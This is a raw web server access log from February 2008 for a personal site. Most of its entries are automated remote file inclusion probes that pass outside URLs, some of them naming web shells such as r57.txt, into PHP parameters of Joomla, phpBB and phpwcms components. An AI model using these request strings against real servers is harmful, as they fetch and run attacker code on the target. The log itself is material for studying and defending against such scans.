205.234.222.47 - - [21/Feb/2008:08:07:53 -0800] "GET /logs/access_071231.log//frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.176.201 - - [21/Feb/2008:08:08:21 -0800] "GET /?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.34.176.201 - - [21/Feb/2008:08:08:21 -0800] "GET /logs/?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 200 36279 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:08:55 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:08:55 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:08:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.253.49.6 - - [21/Feb/2008:08:08:56 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:08:09:11 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/oi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:08:09:11 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/oi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:08:09:12 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/oi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.252.91.7 - - [21/Feb/2008:08:09:51 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/durhaka/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:08:09:51 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/oi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:09:54 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:09:55 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:09:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.31.183.74 - - [21/Feb/2008:08:10:05 -0800] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [21/Feb/2008:08:10:05 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [21/Feb/2008:08:10:05 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:10:34 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:10:34 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:10:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:10:36 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:10:54 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:10:54 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:10:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:11:18 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:11:21 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:11:21 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:11:22 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:11:25 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.31.183.74 - - [21/Feb/2008:08:11:34 -0800] "GET /logs/access_071230.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.242.162 - - [21/Feb/2008:08:11:55 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [21/Feb/2008:08:12:12 -0800] "GET //include.php?path[docroot]=http://img.mehriz.org/image/img/e235cdcfad3f39d87a1d43e772b74e58/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:08:12:27 -0800] "GET /logs/access.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:08:12:28 -0800] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.103.133.246 - - [21/Feb/2008:08:13:15 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:08:13:19 -0800] "GET /logs/access.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:08:13:19 -0800] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:08:13:38 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [21/Feb/2008:08:13:40 -0800] "GET /logs/access_080203.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.frankstonhockeyclub.com/templates/rt_versatility_ii_sienna/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [21/Feb/2008:08:13:40 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.frankstonhockeyclub.com/templates/rt_versatility_ii_sienna/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [21/Feb/2008:08:13:40 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.frankstonhockeyclub.com/templates/rt_versatility_ii_sienna/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:08:14:01 -0800] "GET /logs/access_080106.log//frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.143 - - [21/Feb/2008:08:14:32 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://img.mehriz.org/image/img/e235cdcfad3f39d87a1d43e772b74e58/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [21/Feb/2008:08:14:32 -0800] "GET /logs/config.php?path_to_root=http://img.mehriz.org/image/img/e235cdcfad3f39d87a1d43e772b74e58/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [21/Feb/2008:08:15:17 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://img.mehriz.org/image/img/e235cdcfad3f39d87a1d43e772b74e58/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [21/Feb/2008:08:15:21 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.27 - - [21/Feb/2008:08:15:26 -0800] "GET /logs/access_080110.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:08:15:33 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:08:16:00 -0800] "GET /logs/access_071231.log//frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:08:16:18 -0800] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:08:16:19 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.128.49 - - [21/Feb/2008:08:16:27 -0800] "GET /logs/access_080131.log/index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:08:16:31 -0800] "GET /logs/access_080131.log//modules/TotalCalendar/about.php?inc_dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.128.49 - - [21/Feb/2008:08:16:34 -0800] "GET /logs/index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [21/Feb/2008:08:16:42 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:08:16:42 -0800] "GET /logs/access_080110.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:08:17:11 -0800] "GET /logs/access.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:08:17:11 -0800] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.14.221.150 - - [21/Feb/2008:08:17:18 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:08:17:35 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:17:41 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:08:18:16 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.68.186 - - [21/Feb/2008:08:18:32 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [21/Feb/2008:08:18:32 -0800] "GET /logs/access_080117.log/index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:08:18:38 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:08:19:22 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:19:26 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:19:26 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:08:19:48 -0800] "GET /logs/access_080211.log/joomla/index.php?option=com_restaurante&task=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:08:19:48 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:08:19:48 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:08:19:49 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:08:19:50 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:19:51 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:19:51 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:19:51 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:08:19:57 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:08:19:57 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:08:19:58 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:20:05 -0800] "GET /bughttp://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:08:20:05 -0800] "GET /logs/bughttp://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:08:20:23 -0800] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.202.241.37 - - [21/Feb/2008:08:21:08 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.96.247.163 - - [21/Feb/2008:08:21:18 -0800] "GET /config.php?path_to_root=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:08:21:28 -0800] "GET /logs/access_080211.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:08:21:54 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:08:21:54 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:08:21:54 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.195.239.163 - - [21/Feb/2008:08:22:08 -0800] "GET /funny?N=D HTTP/1.0" 301 78 "http://www.alltheweb.com/search?cat=vid&cs=utf8&q=index+of+funny&rys=0&itag=crv" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
195.195.239.163 - - [21/Feb/2008:08:22:08 -0800] "GET /funny/?N=D HTTP/1.0" 200 796 "http://www.alltheweb.com/search?cat=vid&cs=utf8&q=index+of+funny&rys=0&itag=crv" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
195.195.239.163 - - [21/Feb/2008:08:22:11 -0800] "GET / HTTP/1.0" 200 2946 "http://www.dmulk.com/funny/?N=D" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:08:22:15 -0800] "GET /index2.php?option=com_jjgallery§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:08:22:24 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:08:22:24 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:08:22:24 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.158.86 - - [21/Feb/2008:08:22:32 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [21/Feb/2008:08:22:32 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.52.234 - - [21/Feb/2008:08:22:39 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.52.234 - - [21/Feb/2008:08:22:40 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.52.234 - - [21/Feb/2008:08:22:40 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.35.192.135 - - [21/Feb/2008:08:22:42 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
195.35.192.135 - - [21/Feb/2008:08:22:42 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
195.35.192.135 - - [21/Feb/2008:08:22:43 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
67.18.42.226 - - [21/Feb/2008:08:22:43 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tuidang.net/skin1/main/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.64.195.226 - - [21/Feb/2008:08:22:46 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.64.195.226 - - [21/Feb/2008:08:22:46 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.64.195.226 - - [21/Feb/2008:08:22:47 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:08:22:48 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:08:22:48 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:08:22:49 -0800] "GET /logs/index2.php?option=com_jjgallery§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.169.162.122 - - [21/Feb/2008:08:22:51 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
